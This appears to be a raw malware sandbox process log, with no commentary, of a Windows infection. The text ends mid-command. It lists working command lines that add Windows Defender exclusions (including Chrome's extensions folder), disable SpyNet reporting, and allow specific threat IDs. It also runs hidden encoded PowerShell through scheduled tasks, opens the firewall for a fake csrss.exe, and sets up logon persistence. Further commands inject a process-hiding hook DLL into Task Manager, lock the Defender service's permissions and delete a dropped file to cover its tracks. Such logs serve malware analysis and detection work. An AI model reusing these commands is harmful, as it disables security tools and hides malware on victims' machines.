"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Users\Admin\Pictures\CP1pPdaYSdNNSuryt7kujhW8.exe

"C:\Users\Admin\Pictures\CP1pPdaYSdNNSuryt7kujhW8.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gDKGtXeHw" /SC once /ST 07:43:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gDKGtXeHw"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\7zSBEFA.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe

"C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"

C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe

"C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"

C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe

"C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe

.\Install.exe /YnGgdidyhQpz "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gOEzsPtTT" /SC once /ST 10:56:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gOEzsPtTT"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x3f0040,0x3f004c,0x3f0058

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 856 -ip 856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 2732

C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe

"C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gDKGtXeHw"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\kzkUUCH.exe\" id /pNsite_idAWZ 385118 /S" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gOEzsPtTT"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe\" id /WZsite_idxpt 385118 /S" /V1 /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe id /WZsite_idxpt 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD 